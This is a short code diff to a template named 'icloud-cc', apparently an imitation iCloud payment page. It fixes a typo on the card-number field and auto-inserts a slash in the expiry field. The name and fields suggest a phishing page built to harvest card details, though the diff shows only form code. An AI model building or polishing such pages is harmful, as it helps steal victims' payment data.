--- a/views/icloud-cc.ejs
+++ b/views/icloud-cc.ejs
@@ -13619,7 +13619,7 @@
                                                                 <input type="text" id="cardNumber"
                                                                     class="force-ltr form-textbox form-textbox-text"
                                                                     aria-invalid="false" autofocus=""
-                                                                    data-focus-method="mouse" laceholder="Card Number"
+                                                                    data-focus-method="mouse" placeholder="Card Number"
                                                                     name="cardnumber" pattern="\d{16}" required>
                                                                 <span id="cardNumberError" class="error"></span>
 
@@ -13666,6 +13666,9 @@
                                                             });
 
                                                             expiryDateInput.addEventListener('input', () => {
+                                                                if(expiryDateInput.value.length == 2){
+                                                                    expiryDateInput.value = expiryDateInput.value + "/"
+                                                                }
                                                                 if (!expiryDatePattern.test(expiryDateInput.value)) {
                                                                     expiryDateError.textContent = 'Invalid expiry date (format: mm/dd)';
                                                                 } else {
